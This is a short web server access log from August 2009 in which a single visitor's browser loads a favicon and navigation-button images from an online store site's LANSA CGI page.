74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
